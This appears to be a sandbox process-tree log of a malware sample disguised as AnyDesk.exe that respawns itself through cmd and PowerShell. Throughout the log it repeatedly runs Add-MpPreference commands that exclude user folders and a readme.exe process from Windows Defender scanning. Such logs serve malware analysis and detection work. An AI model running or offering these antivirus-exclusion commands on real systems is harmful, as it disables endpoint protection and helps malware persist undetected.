C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local20⤵PID:8092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local21⤵PID:6756
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music17⤵PID:3420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music18⤵PID:7264
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads17⤵PID:4428
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads18⤵PID:7280
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents17⤵PID:6028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents18⤵PID:7240
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public17⤵PID:5900
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public18⤵PID:7248
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe17⤵PID:2684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe18⤵PID:7204
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp17⤵PID:5260
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp18⤵PID:7272
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop17⤵PID:4652
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop18⤵PID:7292
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads17⤵PID:5504
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads18⤵PID:7212
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local17⤵PID:5396
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local18⤵PID:7180
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music14⤵PID:672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music15⤵PID:4592
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads14⤵PID:5320
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads15⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents14⤵PID:5428
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents15⤵PID:3468
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public14⤵PID:5340
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public15⤵PID:5880
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe14⤵PID:6108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe15⤵PID:2180
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads15⤵PID:7196
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp14⤵PID:6016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp15⤵PID:616
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop14⤵PID:6020
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop15⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads14⤵PID:5864
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads15⤵PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local14⤵PID:5464
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local15⤵PID:4988
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music11⤵PID:3716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music12⤵PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads11⤵PID:5204
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads12⤵PID:3604
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop13⤵PID:7124
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents11⤵PID:4544
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents12⤵PID:4000
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public11⤵PID:1788
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public12⤵PID:6648
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe11⤵PID:2504
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe12⤵PID:3136
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp11⤵PID:5252
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp12⤵PID:2204
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop11⤵PID:5300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop12⤵PID:5776
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads11⤵PID:7004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads12⤵PID:6444
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music8⤵PID:5820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music9⤵PID:6468
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe5⤵PID:3244
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe6⤵PID:5352
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp5⤵PID:2076
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp6⤵PID:5344
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads2⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe1⤵PID:3756
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local1⤵PID:2276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public1⤵PID:6548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe1⤵PID:4612
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"2⤵PID:3416
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local3⤵PID:4628
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local4⤵PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp3⤵PID:6276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp4⤵PID:5532
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe3⤵PID:4516
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe4⤵PID:6552
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"5⤵PID:5784
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe6⤵PID:6784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe7⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"8⤵PID:5252
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe9⤵PID:5384
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe10⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"11⤵PID:8172
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public12⤵PID:8072
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public13⤵PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe12⤵PID:1052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe13⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"14⤵PID:3892
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe15⤵PID:3140
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe16⤵PID:3756
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"17⤵PID:7460
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe18⤵PID:3244
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe19⤵PID:6584
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"20⤵PID:4612
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads21⤵PID:3936
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe21⤵PID:6456
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music18⤵PID:7452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music19⤵PID:6644
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads18⤵PID:5236
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads19⤵PID:7348
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents18⤵PID:6432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents19⤵PID:5164
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public18⤵PID:6820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public19⤵PID:5692
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe18⤵PID:904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe19⤵PID:7160
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp18⤵PID:2144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp19⤵PID:672
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop18⤵PID:4260
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop19⤵PID:5068
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads18⤵PID:4028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads19⤵PID:7188
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local18⤵PID:5796
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local19⤵PID:6276
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music15⤵PID:8004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music16⤵PID:752
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads15⤵PID:4904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads16⤵PID:3536
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents15⤵PID:1924
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents16⤵PID:3496
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public15⤵PID:6424
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public16⤵PID:212
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe15⤵PID:7312
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe16⤵PID:4020
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp15⤵PID:312
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp16⤵PID:6492
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop15⤵PID:4664
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop16⤵PID:8060
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads15⤵PID:3240
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads16⤵PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local15⤵PID:7672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local16⤵PID:4640
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music12⤵PID:6412
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music13⤵PID:5208
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads12⤵PID:5896
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents12⤵PID:4200
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents13⤵PID:6420
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe12⤵PID:1596
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe13⤵PID:3540
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp12⤵PID:4744
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop12⤵PID:3604
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads12⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local12⤵PID:5680
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music9⤵PID:5580
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music10⤵PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads9⤵PID:6152
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads10⤵PID:7932
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents9⤵PID:2736
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents10⤵PID:7612
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public9⤵PID:5380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public10⤵PID:4928
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe9⤵PID:2196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe10⤵PID:1328
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp9⤵PID:7368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp10⤵PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop9⤵PID:6652
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop10⤵PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads9⤵PID:6264
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads10⤵PID:7648
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local9⤵PID:1480
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local10⤵PID:3204
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music6⤵PID:7012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music7⤵PID:7504
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads6⤵PID:8064
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads7⤵PID:8052
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents6⤵PID:5760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents7⤵PID:6924
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public6⤵PID:5168
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public7⤵PID:8108
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe6⤵PID:7088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe7⤵PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp6⤵PID:3472
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp7⤵PID:7896
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop6⤵PID:7256
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop7⤵PID:6480
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads6⤵PID:7632
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads7⤵PID:7388
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local6⤵PID:7904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local7⤵PID:3192
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music3⤵PID:4588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music4⤵PID:6272
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads3⤵PID:2204
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads4⤵PID:668
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents3⤵PID:4076
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents4⤵PID:832
-
-
-
